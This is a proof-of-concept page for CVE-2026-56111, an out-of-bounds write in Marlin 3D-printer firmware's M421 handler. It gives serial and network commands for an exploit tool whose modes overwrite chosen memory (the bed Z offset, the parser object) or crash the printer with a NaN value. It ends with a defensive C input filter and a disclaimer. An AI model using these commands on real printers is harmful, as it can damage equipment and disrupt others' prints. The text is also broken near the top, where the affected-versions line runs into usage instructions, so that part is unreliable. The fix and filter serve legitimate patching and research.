## https://sploitus.com/exploit?id=75711BFE-8B18-55AC-A70F-7ACF021EFAE2
# CVE-2026-56111 - Marlin M421 Out-of-bounds Write

Proof of concept for **CVE-2026-56111**, an out-of-bounds write in the `M421` G-code
handler of [Marlin Firmware](https://github.com/MarlinFirmware/Marlin) when built with
`MESH_BED_LEVELING`.

- Advisory: https://www.vulncheck.com/advisories/marlin-firmware-out-of-bounds-write-via-m421-g-code-handler
- Affected: Marlin ` for USB, e.g. `/dev/ttyUSB0` or `/dev/ttyACM0`
  (add `--baud N` if needed; many boards use `250000`)
- `--tcp ` for printers exposing telnet/network gcode, e.g. `192.168.1.50:23`

### write mode

Send `M421` with the index and value you choose:

```
./exp --serial /dev/ttyUSB0 write -i 3 -j 0 -z 99.0
./exp --tcp 192.168.1.50:23  write -i 5 -j 0 -z 99.0
```

On a default 3x3 grid (valid index 0..2):
- `-i 3 -j 0` writes at offset 36 bytes, which is `z_offset` (the bed Z offset)
- `-i 5 -j 0` writes at offset 60 bytes, which is the parser object

### dos mode

Send an out-of-range index with a NaN Z value. The NaN propagates into the motion math
and reliably crashes or hangs the firmware:

```
./exp --serial /dev/ttyUSB0 dos
./exp --tcp 192.168.1.50:23  dos
```

## Fix

Update to a Marlin build that includes commit `1f255d1`, which bounds the indices the
same way the ABL and UBL handlers already do.
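
For hosts that relay G-code to printers that cannot be reflashed yet, the same bounds check can be applied before the line reaches the firmware. The filter below is an added example, not part of this PoC or of Marlin's code; the function names, the fail-closed policy for `M421`, and the sample lines are assumptions made for the illustration, and the grid size is the default 3x3 described above.

```c
#include <ctype.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GRID_X 3 /* default 3x3 mesh from the page: valid index 0..2 */
#define GRID_Y 3

/* Byte offset of cell (i, j) from the start of a float[GRID_X][GRID_Y] array.
   (3,0) -> 36 and (5,0) -> 60, the offsets listed above. */
size_t mesh_byte_offset(int i, int j) {
    return ((size_t)i * GRID_Y + (size_t)j) * sizeof(float);
}

/* Parse the number after a whitespace-separated parameter such as " I3".
   Returns 1 only if the parameter appears exactly once with a number.
   strtod also accepts "nan" and "inf", so the caller can reject them. */
static int param(const char *args, char letter, double *out) {
    int found = 0;
    for (const char *p = args; *p; p++) {
        if (toupper((unsigned char)*p) != letter) continue;
        if (p == args || !isspace((unsigned char)p[-1])) continue;
        char *end;
        *out = strtod(p + 1, &end);
        if (end == p + 1 || found++) return 0; /* no number, or duplicate */
    }
    return found;
}

static int index_ok(double v, int limit) { /* integer in 0..limit-1; NaN fails */
    return v >= 0 && v < limit && v == (double)(int)v;
}

/* 1 = forward the line to the printer, 0 = drop it. Fails closed for M421. */
int gcode_line_allowed(const char *line) {
    while (isspace((unsigned char)*line)) line++;
    if (toupper((unsigned char)line[0]) != 'M' || strncmp(line + 1, "421", 3) != 0)
        return 1;                                  /* not M421 */
    if (isdigit((unsigned char)line[4])) return 1; /* e.g. M4210, another code */
    double i, j, z;
    const char *args = line + 4;
    if (!param(args, 'I', &i) || !param(args, 'J', &j) || !param(args, 'Z', &z))
        return 0;
    return index_ok(i, GRID_X) && index_ok(j, GRID_Y) && isfinite(z);
}

int main(void) { /* constructed sample lines, not captured traffic */
    const char *lines[] = { "G28", "M421 I1 J2 Z0.05", "M421 I3 J0 Z99.0" };
    for (size_t k = 0; k < 3; k++)
        printf("%-18s -> %s\n", lines[k], gcode_line_allowed(lines[k]) ? "forward" : "drop");
}
```

The filter assumes lines arrive without `N` line-number prefixes or checksums, and it drops any `M421` that does not carry exactly one in-range `I`, one in-range `J` and a finite `Z`.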

## Disclaimer

For research and authorized testing only. Use only on devices you own or have explicit
permission to test. Sending these commands can crash a printer or disrupt a print.